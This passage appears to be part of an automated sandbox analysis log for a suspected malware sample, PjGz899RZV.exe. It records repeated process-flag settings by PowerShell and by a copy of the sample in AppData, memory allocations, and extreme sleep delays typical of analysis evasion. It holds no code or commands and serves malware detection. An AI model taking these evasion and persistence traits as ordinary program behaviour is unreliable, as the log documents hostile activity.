            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\PjGz899RZV.exeMemory allocated: 610000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeMemory allocated: 1A390000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeMemory allocated: 2E80000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeMemory allocated: 1B090000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeMemory allocated: 28B0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeMemory allocated: 1AB90000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeMemory allocated: F10000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeMemory allocated: 1AC90000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeMemory allocated: 26B0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeMemory allocated: 1A8A0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\PjGz899RZV.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\PjGz899RZV.exeWindow / User API: threadDelayed 2600Jump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeWindow / User API: threadDelayed 7181Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5093Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4707Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6285Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3410Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6713Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2926Jump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exe TID: 1540Thread sleep time: -28592453314249787s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6368Thread sleep time: -7378697629483816s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4828Thread sleep count: 6285 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4828Thread sleep count: 3410 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5708Thread sleep time: -4611686018427385s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3460Thread sleep time: -4611686018427385s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe TID: 2536Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe TID: 3040Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe TID: 716Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\PjGz899RZV.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
